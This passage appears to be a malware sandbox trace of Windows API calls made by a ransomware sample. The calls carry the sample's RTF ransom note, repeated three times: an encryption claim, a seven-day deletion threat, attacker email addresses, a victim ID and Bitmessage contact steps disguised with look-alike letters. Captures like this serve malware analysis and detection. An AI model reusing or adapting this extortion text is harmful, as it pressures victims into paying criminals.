lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0259.360] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0259.360] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0259.360] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il 